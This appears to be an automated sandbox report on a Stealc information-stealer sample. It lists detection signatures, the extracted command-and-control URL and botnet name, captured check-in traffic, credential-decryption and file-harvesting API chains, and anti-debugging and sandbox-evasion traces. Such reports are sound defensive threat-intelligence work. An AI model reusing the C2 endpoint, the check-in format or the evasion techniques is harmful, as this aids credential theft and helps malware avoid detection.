Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1540505
MD5:de1624f6c5d98d559c64c9c30359b942
SHA1:b02c82eeb4d1e7b768633ef276f182b653db29fc
SHA256:3a98e0f2785d57188cab067e1c48a2355d69212f432380d94315db75d1be30ce
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DE1624F6C5D98D559C64C9C30359B942)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6448JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6448JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.fb0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-23T20:55:05.940663+020020442431Malware Command and Control Activity Detected192.168.2.749699185.215.113.3780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: 0.2.file.exe.fb0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: file.exeReversingLabs: Detection: 47%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00FBC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FB9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FB7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FB9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00FC8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBDE10

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 31 38 30 31 45 34 43 42 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="hwid"CD1801E4CB7B1953448019------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build"doma------IDBKKKKKFBGDGDHIDBGH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FB4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 31 38 30 31 45 34 43 42 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="hwid"CD1801E4CB7B1953448019------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build"doma------IDBKKKKKFBGDGDHIDBGH--
                Source: file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/3O
                Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1291738753.0000000000E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
                Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8_Tv
                Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpD_
                Source: file.exe, 00000000.00000002.1291738753.0000000000E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX_
                Source: file.exe, 00000000.00000002.1291738753.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37g

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013531550_2_01353155
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D0_2_0139495D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137C1A90_2_0137C1A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012321D70_2_012321D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138C30F0_2_0138C30F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013913450_2_01391345
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01388B920_2_01388B92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01399A110_2_01399A11
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139640C0_2_0139640C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139B46D0_2_0139B46D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139CF040_2_0139CF04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01308F690_2_01308F69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C97A00_2_013C97A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139EFCE0_2_0139EFCE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138DE5C0_2_0138DE5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0138A6AF0_2_0138A6AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01392EA00_2_01392EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013876A70_2_013876A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01397EC20_2_01397EC2
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FB45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: sacriosm ZLIB complexity 0.9950929799139691
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FC8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00FC3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\XCLHRD0D.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1911808 > 1048576
                Source: file.exeStatic PE information: Raw size of sacriosm is bigger than: 0x100000 < 0x1aca00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sacriosm:EW;bxtvqvzl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sacriosm:EW;bxtvqvzl:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d7b34 should be: 0x1d67c6
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: sacriosm
                Source: file.exeStatic PE information: section name: bxtvqvzl
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013D712C push 5B4551ACh; mov dword ptr [esp], edx0_2_013D714E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013C9104 push 213D8DF4h; mov dword ptr [esp], esi0_2_013C9128
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01484177 push 15970855h; mov dword ptr [esp], edx0_2_0148419B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BF96E push 36287A32h; mov dword ptr [esp], eax0_2_013BF9AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E0176 push 1F82D150h; mov dword ptr [esp], ebx0_2_012E0197
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E0176 push eax; mov dword ptr [esp], 7FBFBD57h0_2_012E01B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01353155 push ebp; mov dword ptr [esp], eax0_2_01353159
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01353155 push edi; mov dword ptr [esp], 79F31B78h0_2_0135317D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push edx; mov dword ptr [esp], 6E185FC6h0_2_01394965
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 3DCA8B7Ah; mov dword ptr [esp], ebp0_2_013949E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push edx; mov dword ptr [esp], eax0_2_01394A94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 08AC2DEBh; mov dword ptr [esp], ebx0_2_01394AD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebp; mov dword ptr [esp], edi0_2_01394B8B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebp; mov dword ptr [esp], ebx0_2_01394BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 0A3B321Eh; mov dword ptr [esp], esi0_2_01394BC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push edx; mov dword ptr [esp], 77267F43h0_2_01394BE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 3094F9BDh; mov dword ptr [esp], ecx0_2_01394C77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 283F7A17h; mov dword ptr [esp], edi0_2_01394CF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebp; mov dword ptr [esp], 6F6BAF96h0_2_01394D2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebx; mov dword ptr [esp], 3146EFC7h0_2_01394D93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebx; mov dword ptr [esp], ecx0_2_01394D9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push eax; mov dword ptr [esp], edi0_2_01394E13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 07BD69AFh; mov dword ptr [esp], ecx0_2_01394EA3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 0876BF65h; mov dword ptr [esp], edx0_2_01394EF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 200EFB96h; mov dword ptr [esp], esi0_2_01394F08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebx; mov dword ptr [esp], 3A85B921h0_2_01394F47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebx; mov dword ptr [esp], ebp0_2_01394F80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push 76D46DF6h; mov dword ptr [esp], edi0_2_01394FA1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push esi; mov dword ptr [esp], ecx0_2_01394FA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ecx; mov dword ptr [esp], edi0_2_01394FAB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139495D push ebp; mov dword ptr [esp], edx0_2_013950E8
                Source: file.exeStatic PE information: section name: sacriosm entropy: 7.954815877107788

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC9860

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13572
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211961 second address: 121196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6146 second address: 13A614C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A614C second address: 13A6150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A50B9 second address: 13A50C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A50C6 second address: 13A50CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A525B second address: 13A525F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A525F second address: 13A526B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53C6 second address: 13A53CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53CA second address: 13A53D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A53D0 second address: 13A53FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2A68BE4F4Eh 0x00000008 jl 00007F2A68BE4F46h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2A68BE4F56h 0x00000019 rdtsc
